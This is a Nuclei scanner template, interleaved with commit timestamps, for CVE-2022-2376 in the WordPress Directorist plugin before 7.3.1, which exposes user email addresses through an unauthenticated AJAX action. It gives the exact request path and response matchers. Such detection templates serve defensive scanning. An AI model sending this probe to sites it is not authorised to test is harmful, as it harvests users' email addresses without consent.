2022-09-06 08:57:31 +00:00
id : CVE-2022-2376
info :
2023-04-07 15:53:22 +00:00
name : WordPress Directorist <7.3.1 - Information Disclosure
2022-09-06 08:57:31 +00:00
author : Random-Robbie
severity : medium
2023-04-07 15:53:22 +00:00
description : WordPress Directorist plugin before 7.3.1 is susceptible to information disclosure. The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and authenticated users.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can gain sensitive information about the WordPress installation, potentially leading to further attacks.
2023-09-06 11:59:08 +00:00
remediation : Fixed in version 7.3.1.
2022-09-06 08:57:31 +00:00
reference :
- https://wpscan.com/vulnerability/437c4330-376a-4392-86c6-c4c7ed9583ad
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2376
- https://nvd.nist.gov/vuln/detail/CVE-2022-2376
2022-09-09 11:31:09 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score : 5.3
cve-id : CVE-2022-2376
cwe-id : CWE-862
2024-01-14 13:49:27 +00:00
epss-score : 0.04117
epss-percentile : 0.91273
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : wpwax
product : directorist
2023-09-06 11:59:08 +00:00
framework : wordpress
2023-12-05 09:50:33 +00:00
tags : cve,cve2022,wp-plugin,wpscan,wordpress,wp,directorist,unauth,disclosure,wpwax
2022-09-06 08:57:31 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-09-06 08:57:31 +00:00
- method : GET
path :
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination'
matchers-condition : and
matchers :
- type : word
part : body
words :
- 'directorist-authors__card__details__top'
- 'directorist-authors__card__info-list'
2022-09-09 11:02:19 +00:00
condition : and
2022-09-06 08:57:31 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2024-01-14 14:05:19 +00:00
# digest: 4a0a0047304502204881a02cf48ccb3ae38a2dd0c3bce94269852289dd11313a73e84273dbf76154022100b12b57e3640987902f6b5cc6aab3b77301ffbc493d695301293037e08a9fe276:922c64590222798bb761d5b6d8e72950